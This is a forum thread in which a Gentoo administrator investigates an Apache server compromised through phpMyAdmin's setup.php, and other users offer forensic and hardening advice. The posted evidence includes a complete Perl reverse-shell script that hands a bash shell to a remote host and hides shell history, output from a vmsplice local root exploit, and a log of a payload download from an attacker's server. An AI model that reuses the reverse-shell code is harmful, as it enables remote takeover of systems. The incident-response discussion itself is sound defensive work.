# Found ./exploit running as apache

## newtonian

after apache becoming non-responsive I did a htop and found that 

apache running from ./exploit was using up all of the cpu

I killed the processes and all was fine.  I did a find -name exploit -print from the root

directory, hoping to find a file called exploit but nothing came up.

```

apache    2128 52.8  0.2  34028  3812 ?        R    Aug04 2039:58 /usr/sbin/apache/logs

apache    4302 61.4  0.1  21232  1732 ?        R    Aug03 3207:05 ./exploit

root      4779  0.0  0.0   7272   732 pts/3    R+   16:21   0:00 grep --colour=auto apache

apache   22869 57.8  0.1  21232  1732 ?        R    Aug03 2707:47 ./exploit
```

Anyone familiar with apache running a file called exploit?

Cheers,

----------

## msalerno

Who knows where it came from, but you are going to get lots of people telling you to wipe the box and reinstall.  You should have tried to get more info about the process before you killed it.

----------

## d2_racing

Indeed, now that the process is gone, maybe there a way to find more info about that exploit file.

----------

## msalerno

Your situation inspired me to writeup the following post:

https://forums.gentoo.org/viewtopic-p-6378504.html

----------

## Anarcho

And maybe it would've been better to really kill (kill -9) the process as there might be a signal handler which deletes the file on SIGTERM.

But you should really try to find out through which way the exploit have been uploaded to your filesystem. After that, reinstall the server and fix the problem!

----------

## Hu

As an addendum, if you want to stop the process, hit it with a SIGSTOP first.  That cannot be blocked, so unless it has a buddy to resume it, it will suspend in response to that.  After it is suspended, you can do initial forensics, and kill the process with a SIGKILL when you are done.  It may have unlinked itself upon startup, which would make it more difficult to get at the underlying program.

In the meantime, check your Apache access and error logs.  Perhaps you will get lucky and find what was used to upload the exploit bootstrap code.

----------

## newtonian

Thanks for all of the awesome responses.

I found the same process running on another machine.  Here is the output of msalerno's guide:

https://forums.gentoo.org/viewtopic-p-6378504.html

```
lsof -p 22533

COMMAND   PID   USER   FD      TYPE             DEVICE      SIZE     NODE NAME

exploit 22533 apache  cwd       DIR                8,4         0  4317251 /var/tmp/xpl/32 (deleted)

exploit 22533 apache  rtd       DIR                8,4      4096        2 /

exploit 22533 apache  txt       REG                8,4     32618  4317256 /var/tmp/xpl/32/exploit (deleted)

exploit 22533 apache  mem       REG                8,4    114952  1220694 /lib64/ld-2.6.1.so

exploit 22533 apache  mem       REG                8,4     14528  1220708 /lib64/libdl-2.6.1.so

exploit 22533 apache  mem       REG                8,4   1293456  1220702 /lib64/libc-2.6.1.so

exploit 22533 apache  DEL       REG                8,4            4317260 /var/tmp/xpl/32/exp_cheddarbay.so

exploit 22533 apache  DEL       REG                8,4            4317332 /var/tmp/xpl/32/exp_ingom0wnar.so

exploit 22533 apache  DEL       REG                8,4            4317327 /var/tmp/xpl/32/exp_moosecox.so

exploit 22533 apache  DEL       REG                8,4            4317282 /var/tmp/xpl/32/exp_paokara.so

exploit 22533 apache  DEL       REG                8,4            4317259 /var/tmp/xpl/32/exp_powerglove.so

exploit 22533 apache  DEL       REG                8,4            4317281 /var/tmp/xpl/32/exp_therebel.so

exploit 22533 apache  DEL       REG                8,4            4317258 /var/tmp/xpl/32/exp_wunderbar.so

exploit 22533 apache    0u     sock                0,4           48181637 can't identify protocol

exploit 22533 apache    1u     sock                0,4           48181637 can't identify protocol

exploit 22533 apache    2u     sock                0,4           48181637 can't identify protocol

exploit 22533 apache    3w     FIFO                0,5           48181633 pipe

exploit 22533 apache    4u     IPv4           47576424                TCP *:http (LISTEN)

exploit 22533 apache    5r     FIFO                0,5           47576437 pipe

exploit 22533 apache    6w     FIFO                0,5           47576437 pipe

exploit 22533 apache    7w      REG                8,4      1281  3875216 /var/log/apache2/ssl_error_log

exploit 22533 apache    8w      REG                8,4 340378372  3876416 /var/log/apache2/access_log

exploit 22533 apache    9w      REG                8,4      2866  3875215 /var/log/apache2/ssl_access_log

exploit 22533 apache   10w      REG                8,4      3268  3875217 /var/log/apache2/ssl_request_log

exploit 22533 apache   11w      REG                8,4         0  4440068 /var/run/ssl_mutex (deleted)

exploit 22533 apache   12w      REG                8,4 808690834  3875212 /var/log/apache2/mod_jk.log

exploit 22533 apache   13u      REG                8,4     28800  3876429 /var/log/apache2/mod_jk.shm.22136 (deleted)

exploit 22533 apache   14u      REG                8,4         1  3876438 /var/log/apache2/mod_jk.shm.22136.lock (deleted)

exploit 22533 apache   15r     0000                0,9         0 47593281 eventpoll

exploit 22533 apache   16u     sock                0,4           47625594 can't identify protocol

exploit 22533 apache   17u     IPv4           47601843                TCP server.domain.com:33369->server.domain.com:8009 (CLOSE_WAIT)

exploit 22533 apache   18u     unix 0xffff8800711796c0           47598822 socket

exploit 22533 apache   19w     FIFO                0,5           48372130 pipe

exploit 22533 apache   21w  unknown                                       /proc/22533/fd/21 (readlink: No such file or directory)

```

```
dr-xr-xr-x   5 apache apache 0 Aug 11 13:35 .

dr-xr-xr-x 156 root   root   0 Apr 22 18:52 ..

dr-xr-xr-x   2 apache apache 0 Aug 11 16:19 attr

-r--------   1 apache apache 0 Aug 11 16:19 auxv

-r--r--r--   1 apache apache 0 Aug 11 16:18 cmdline

lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 cwd -> /var/tmp/xpl/32 (deleted)

-r--------   1 apache apache 0 Aug 11 16:19 environ

lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 exe -> /var/tmp/xpl/32/exploit (deleted)

dr-x------   2 apache apache 0 Aug 11 13:36 fd

-r--r--r--   1 apache apache 0 Aug 11 16:18 maps

-rw-------   1 apache apache 0 Aug 11 16:19 mem

-r--r--r--   1 apache apache 0 Aug 11 16:19 mounts

-r--------   1 apache apache 0 Aug 11 16:19 mountstats

-rw-r--r--   1 apache apache 0 Aug 11 16:19 oom_adj

-r--r--r--   1 apache apache 0 Aug 11 16:19 oom_score

lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 root -> /

-rw-------   1 apache apache 0 Aug 11 16:19 seccomp

-r--r--r--   1 apache apache 0 Aug 11 16:19 smaps

-r--r--r--   1 apache apache 0 Aug 11 16:18 stat

-r--r--r--   1 apache apache 0 Aug 11 16:19 statm

-r--r--r--   1 apache apache 0 Aug 11 16:18 status

dr-xr-xr-x   3 apache apache 0 Aug 11 13:35 task

-r--r--r--   1 apache apache 0 Aug 11 16:19 wchan
```

strace -p 22533 reported this:

```

pipe([20, 21])                          = 0

close(20)                               = 0

close(21)                               = 0

pipe([20, 21])                          = 0

close(20)                               = 0

close(21)                               = 0

pipe([20, 21])                          = 0

close(20)                               = 0

close(21)                               = 0

pipe([20, 21])                          = 0

close(20)                               = 0

close(21)                               = 0

pipe([20, 21])                          = 0

close(20)                               = 0

close(21, 21])                          = 0

Process 22533 detached

```

```
echo CWD `readlink /proc/22533/cwd` > ~/procinfo.log

cat ~/procinfo.log

CWD /var/tmp/xpl/32 (deleted)
```

```
 cat /proc/22533/cmdline

./exploit
```

```
 cat /proc/22533/environ

SHELL=/bin/shDEFAULTLEVEL=defaultLC_ALL=en_US.UTF-8USER=rootPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/bin:/binPWD=/var/tmp/xpl/32LANG=en_US.UTF-8BOOTLEVEL=bootSVCNAME=apache2CONSOLETYPE=serialSHLVL=5HOME=/rootSOFTLEVEL=default_=./exploit
```

I got lost from cat /proc/<pid of process>/ as that is a directory on my system and I couldn't find any tar files around.

lsof -p 22533 shows a few source files which a google search reveals that this is the enlightenment hack.  More googling led me to look in /var/tmp/

```
ls -la /var/tmp/

total 366468

drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .

drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..

-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt

-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt

-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt

-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt

drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs

drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage

drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6

-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3

```

```
cat back.txt

#!/usr/bin/perl

use IO::Socket;

$system    = '/bin/bash';

$ARGC=@ARGV;

print "--== Fucking Machine ==-- \n\n";

if ($ARGC!=2) {

   print "Usage: $0 [Host] [Port] \n\n";

   die "Ex: $0 127.0.0.1 2121 \n";

}

use Socket;

use FileHandle;

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";

print "[*] Spawning Shell \n";

SOCKET->autoflush();

open(STDIN, ">&SOCKET");

open(STDOUT,">&SOCKET");

open(STDERR,">&SOCKET");

print "--== Thuraya Team ==--  \n\n";

system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");

system($system);
```

```
 cat 1.txt 2.txt 3.txt

-----------------------------------

 Linux vmsplice Local Root Exploit

 By qaaz

-----------------------------------

[+] mmap: 0x0 .. 0x1000

[+] page: 0x0

[+] page: 0x20

[+] mmap: 0x4000 .. 0x5000

[+] page: 0x4000

[+] page: 0x4020

[+] mmap: 0x1000 .. 0x2000

[+] page: 0x1000

[+] mmap: 0xf7e52000 .. 0xf7e84000

[-] wtf

-----------------------------------

 Linux vmsplice Local Root Exploit

 By qaaz

-----------------------------------

[+] mmap: 0x0 .. 0x1000

[+] page: 0x0

[+] page: 0x20

[+] mmap: 0x4000 .. 0x5000

[+] page: 0x4000

[+] page: 0x4020

[+] mmap: 0x1000 .. 0x2000

[+] page: 0x1000

[+] mmap: 0xf7e6f000 .. 0xf7ea1000

[-] wtf

-----------------------------------

 Linux vmsplice Local Root Exploit

 By qaaz

-----------------------------------

[+] mmap: 0x0 .. 0x1000

[+] page: 0x0

[+] page: 0x20

[+] mmap: 0x4000 .. 0x5000

[+] page: 0x4000

[+] page: 0x4020

[+] mmap: 0x1000 .. 0x2000

[+] page: 0x1000

[+] mmap: 0xf7e65000 .. 0xf7e97000

[-] wtf

```

found this in the error log:

```
--2010-08-04 00:00:11--  http://smenar.do.am/fuck.txt

Resolving smenar.do.am... 195.216.243.36

Connecting to smenar.do.am|195.216.243.36|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 17247 (17K) [text/plain]

Saving to: `fuck.txt'

     0K .......... ......                                     100% 24.6K=0.7s

2010-08-04 00:00:13 (24.6 KB/s) - `fuck.txt' saved [17247/17247]

```

looked for the file on the machine but it didn't exist.

Here is the call that uploaded the file to the server:

```

myserverip 66.7.208.173 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://210.48.255.38/phpmyadmin/scripts/setup.php" "Opera"

- 127.0.0.1 - - [04/Aug/2010:00:00:18 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"

```

```
 emerge --search phpmyadmin

Searching...

[ Results for search key : phpmyadmin ]

[ Applications found : 1 ]

*  dev-db/phpmyadmin

      Latest version available: 2.11.10

      Latest version installed: 2.11.9.4

      Size of files: 2,172 kB

      Homepage:      http://www.phpmyadmin.net/

      Description:   Web-based administration for MySQL database in PHP

      License:       GPL-2

```

I'm not sure how they hacked through phpadmin setup.php as I don't have a config directory.  I'll have to look for other hacks.

None of the files seem modified.

```
ls -l /var/www/localhost/htdocs/phpmyadmin/

total 1456

-rw-r--r--  2 root root  10873 2009-01-25 21:02 browse_foreigners.php

-rw-r--r--  2 root root    758 2009-01-25 21:02 calendar.php

-rw-r--r--  2 root root  31282 2009-01-25 21:02 ChangeLog

-rw-r--r--  2 root root   3459 2009-01-25 21:02 changelog.php

-rw-r--r--  2 root root    460 2009-01-25 21:02 chk_rel.php

-rw-r--r--  1 root root   1749 2009-01-25 21:09 config.inc.php

-rw-r--r--  2 root root   1751 2009-01-25 21:02 config.sample.inc.php

drwxr-xr-x  3 root root   4096 2009-01-25 21:02 contrib

-rw-r--r--  2 root root   1470 2009-01-25 21:02 db_create.php

-rw-r--r--  2 root root  10681 2009-01-25 21:02 db_datadict.php

-rw-r--r--  2 root root   2475 2009-01-25 21:02 db_export.php

-rw-r--r--  2 root root    471 2009-01-25 21:02 db_import.php

-rw-r--r--  2 root root  19871 2009-01-25 21:02 db_operations.php

-rw-r--r--  2 root root   7422 2009-01-25 21:02 db_printview.php

-rw-r--r--  2 root root  34751 2009-01-25 21:02 db_qbe.php

-rw-r--r--  2 root root  13999 2009-01-25 21:02 db_search.php

-rw-r--r--  2 root root    999 2009-01-25 21:02 db_sql.php

-rw-r--r--  2 root root  22432 2009-01-25 21:02 db_structure.php

-rw-r--r--  2 root root   4583 2009-01-25 21:02 docs.css

-rw-r--r--  2 root root 222262 2009-01-25 21:02 Documentation.html

-rw-r--r--  2 root root 157063 2009-01-25 21:02 Documentation.txt

-rw-r--r--  2 root root   2167 2009-01-25 21:02 error.php

-rw-r--r--  2 root root  24843 2009-01-25 21:02 export.php

-rw-r--r--  2 root root  18902 2009-01-25 21:02 favicon.ico

-rw-r--r--  2 root root  13934 2009-01-25 21:02 import.php

-rw-r--r--  2 root root   6586 2009-01-25 21:02 index.php

drwxr-xr-x  2 root root   4096 2009-01-25 21:02 js

drwxr-xr-x  2 root root   4096 2009-01-25 21:02 lang

drwxr-xr-x 10 root root   4096 2009-01-25 21:21 libraries

-rw-r--r--  2 root root    411 2009-01-25 21:02 license.php

-rw-r--r--  2 root root  15889 2009-01-25 21:02 main.php

-rw-r--r--  2 root root  26259 2009-01-25 21:02 navigation.php

-rw-r--r--  2 root root  27182 2009-01-25 21:02 pdf_pages.php

-rw-r--r--  2 root root  52735 2009-01-25 21:02 pdf_schema.php

-rw-r--r--  2 root root    360 2009-01-25 21:02 phpinfo.php

-rw-r--r--  2 root root  16613 2009-01-25 21:02 phpmyadmin.css.php

drwxr-xr-x  5 root root   4096 2009-01-25 21:02 pmd

-rw-r--r--  2 root root  11227 2009-01-25 21:02 pmd_common.php

-rw-r--r--  2 root root   1917 2009-01-25 21:02 pmd_display_field.php

-rw-r--r--  2 root root  18486 2009-01-25 21:02 pmd_general.php

-rw-r--r--  2 root root    880 2009-01-25 21:02 pmd_help.php

-rw-r--r--  2 root root   3372 2009-01-25 21:02 pmd_pdf.php

-rw-r--r--  2 root root   3942 2009-01-25 21:02 pmd_relation_new.php

-rw-r--r--  2 root root   1901 2009-01-25 21:02 pmd_relation_upd.php

-rw-r--r--  2 root root   2248 2009-01-25 21:02 pmd_save_pos.php

-rw-r--r--  2 root root   1063 2009-01-25 21:02 print.css

-rw-r--r--  2 root root   9722 2009-01-25 21:02 querywindow.php

-rw-r--r--  2 root root    403 2009-01-25 21:02 readme.php

drwxr-xr-x  2 root root   4096 2009-01-25 21:02 scripts

-rw-r--r--  2 root root   7653 2009-01-25 21:02 server_binlog.php

-rw-r--r--  2 root root   2784 2009-01-25 21:02 server_collations.php

-rw-r--r--  2 root root  13284 2009-01-25 21:02 server_databases.php

-rw-r--r--  2 root root   4917 2009-01-25 21:02 server_engines.php

-rw-r--r--  2 root root   1639 2009-01-25 21:02 server_export.php

-rw-r--r--  2 root root    486 2009-01-25 21:02 server_import.php

-rw-r--r--  2 root root 110708 2009-01-25 21:02 server_privileges.php

-rw-r--r--  2 root root   2869 2009-01-25 21:02 server_processlist.php

-rw-r--r--  2 root root    581 2009-01-25 21:02 server_sql.php

-rw-r--r--  2 root root  20731 2009-01-25 21:02 server_status.php

-rw-r--r--  2 root root   2462 2009-01-25 21:02 server_variables.php

-rw-r--r--  2 root root    317 2009-01-25 21:02 show_config_errors.php

-rw-r--r--  2 root root  29485 2009-01-25 21:02 sql.php

-rw-r--r--  2 root root   9097 2009-01-25 21:02 tbl_addfield.php

-rw-r--r--  2 root root   9463 2009-01-25 21:02 tbl_alter.php

-rw-r--r--  2 root root  46319 2009-01-25 21:02 tbl_change.php

-rw-r--r--  2 root root   9322 2009-01-25 21:02 tbl_create.php

-rw-r--r--  2 root root   2594 2009-01-25 21:02 tbl_export.php

-rw-r--r--  2 root root    635 2009-01-25 21:02 tbl_import.php

-rw-r--r--  2 root root  15997 2009-01-25 21:02 tbl_indexes.php

-rw-r--r--  2 root root   2186 2009-01-25 21:02 tbl_move_copy.php

-rw-r--r--  2 root root  19804 2009-01-25 21:02 tbl_operations.php

-rw-r--r--  2 root root  18270 2009-01-25 21:02 tbl_printview.php

-rw-r--r--  2 root root  24311 2009-01-25 21:02 tbl_relation.php

-rw-r--r--  2 root root  12626 2009-01-25 21:02 tbl_replace.php

-rw-r--r--  2 root root   4423 2009-01-25 21:02 tbl_row_action.php

-rw-r--r--  2 root root  17905 2009-01-25 21:02 tbl_select.php

-rw-r--r--  2 root root    939 2009-01-25 21:02 tbl_sql.php

-rw-r--r--  2 root root  34710 2009-01-25 21:02 tbl_structure.php

drwxr-xr-x  2 root root   4096 2009-01-25 21:02 test

drwxr-xr-x  4 root root   4096 2009-01-25 21:02 themes

-rw-r--r--  2 root root   1096 2009-01-25 21:02 themes.php

-rw-r--r--  2 root root   1752 2009-01-25 21:02 transformation_overview.php

-rw-r--r--  2 root root   4068 2009-01-25 21:02 transformation_wrapper.php

-rw-r--r--  2 root root   8209 2009-01-25 21:02 translators.html

-rw-r--r--  2 root root   3573 2009-01-25 21:02 user_password.php

-rw-r--r--  2 root root   4215 2009-01-25 21:02 view_create.php

```

So now I have to figure out how they got into via phpmyadmin setup.php, what and where fuck.txt is and whether or not the vmsplice Local Root Exploit works on this xen kernel.  Then rebuild the machine from scratch.  : P  Ouch...

Thanks for all the help so far guys.

Cheers,

----------

## Anon-E-moose

I don't run phpmyadmin, but for anything that I don't want the world to see, 

I keep localhost separate under /var/www/ and 

put things that I don't want the world to know about there..

----------

## msalerno

Have you checked the phpmyadmin site to see if there are any security issues with the version you are running?

You could also do a "glsa-check --test all" and see what gets returned.

----------

## Hu

 *newtonian wrote:*   

> More googling led me to look in /var/tmp/
> 
> ```
> ls -la /var/tmp/
> 
> ...

 Some of those suspicious files have rather old mtimes.  This is not definitive since an mtime can be changed to an arbitrary value at will, but it could mean that you have been successfully attacked some time ago.

PHP is a frequent source of security problems.  I suggest making some changes on the rebuilt server to restrict access to it.  Make at least one of these changes, if at all possible.  Layering several together is probably overkill, but has no significant technical drawbacks.If possible, serve it from a VirtualHost that listens only to localhost.Use Apache configuration directives to require HTTP-based authentication to access any file in the phpmyadmin directory hierarchy.  This will provide some basic protection if an authentication bypass is found in phpmyadmin, since the attacker must still have a valid HTTP login to get past the Apache check.Require HTTPS to access the site that serves phpmyadmin.  This protects the credentials from the previous bullet, and may also cause some attackers to miss the presence of the directory if they probe only sites served over HTTP.Install to a directory with a non-standard name, such as /admin.2eD6pw/phpmyadmin/ and do not provide any publicly readable hyperlinks that point to this directory.  Choose the upper level directory name by combining a useful string ("admin") with a random string (to discourage guessing).  This is a crude form of security by obscurity, but it should prevent bots from just wandering in.

----------

## Anon-E-moose

I would also lock down the directories and any password or other sensitive files from being read.

I used vhosts on my system, with separate directories for localhost and my dns name.

----------

## Tony Schwartz

I tracked this down to a known exploit in phpMyAdmin.

The problem for me was that I did not remove the setup.php script from the scripts directory in the phpMyAdmin installation.

There is a known exploit that is described here:  http://www.nessus.org/plugins/index.php?view=single&id=48908

The problem allows an attacker to execute arbitrary PHP code.

For me, it was pretty easy to clean the components of this problem by removing the scripts from the /tmp directory that were generated.  see the .mysql.log directory and any other scripts in the tmp directory.  kill apache, make sure your phpMyAdmin doesn't have a setup.php script and make sure all your httpd processes are dead, and the /usr/sbin/apache/*** processes are dead too.  Then, safely restart httpd. 

Hope this helps.

T

----------

## molot

Depending on your php settings, "arbitrary php code" might be enough to setup other backdoor. Hardly possible, but possible. Check twice for any traces of edits like that.

Hope you'll be OK.

----------

